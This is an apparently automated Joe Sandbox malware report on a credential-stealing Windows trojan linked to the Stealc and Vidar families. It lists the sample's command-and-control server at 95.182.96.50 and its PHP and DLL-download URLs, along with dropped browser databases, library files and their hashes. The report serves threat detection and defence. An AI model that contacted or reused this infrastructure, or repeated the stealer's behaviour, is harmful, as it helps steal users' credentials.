http://95.182.96.50/	true	unknown
http://95.182.96.50/2aced82320799c96.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/)	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.502aced82320799c96.phpsition:	fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll:SJ	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpf	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/2aced82320799c96.phpi	fXg8zgxVTF.exe, 00000000.00000002.2395860797.00000000353D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/fee3b98529eb4b43/softokn3.dllr	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/fee3b98529eb4b43/nss3.dllt	fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50	fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/2aced82320799c96.phpzj	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sqlite.org/copyright.html.	fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396113790.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	fXg8zgxVTF.exe, fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://95.182.96.50/2aced82320799c96.phpEJpm	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/fee3b98529eb4b43/nss3.dllW	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/fee3b98529eb4b43/freebl3.dll.	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	JKFCBAEHCAEGDHJKFHJK.0.dr	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/fee3b98529eb4b43/mozglue.dll.	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/fee3b98529eb4b43/nss3.dllm	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/2aced82320799c96.phpbj	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.50/fee3b98529eb4b43/softokn3.dllD	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpft	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpData	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll4	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpance	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://95.182.96.500	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false		unknown
http://www.seriousbit.com/	fXg8zgxVTF.exe	false		unknown
http://seriousbit.com/	fXg8zgxVTF.exe	false		unknown
https://support.mozilla.org	IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpsition:	fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr	false	URL Reputation: safe	unknown
http://95.182.96.50/2aced82320799c96.phpe5	fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.182.96.50	unknown	Russian Federation		34518	FATUM-ASRussiaKazan420061Kosmonavtovstr29aRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541134
Start date and time:	2024-10-24 13:53:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fXg8zgxVTF.exe renamed because original name is a hash value
Original Sample Name:	c7ca98803a76b62a6a379a0b684b162a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 163
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: fXg8zgxVTF.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FATUM-ASRussiaKazan420061Kosmonavtovstr29aRU	kNAs2Vll7g	Get hash	malicious	Unknown	Browse	88.82.87.190

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	T220UXIoKO.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	T220UXIoKO.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AFCBFIJEHDHCBGDGDGCB

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFCGIIEHIEGDGDGCAEBGDAKFCB

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFHDBFIEGIDGIECBKJECBKFHCA

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCAFIDB

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHIJJJEG

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHIJJJEGDBFHDHJJDBAKKJJECA

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDGCGHIJKEGIECBFCBAE

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJDBGDGCGDAKFIDGIDBFIEHDHJ

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKFCBAEHCAEGDHJKFHJK

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T220UXIoKO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: T220UXIoKO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\fXg8zgxVTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
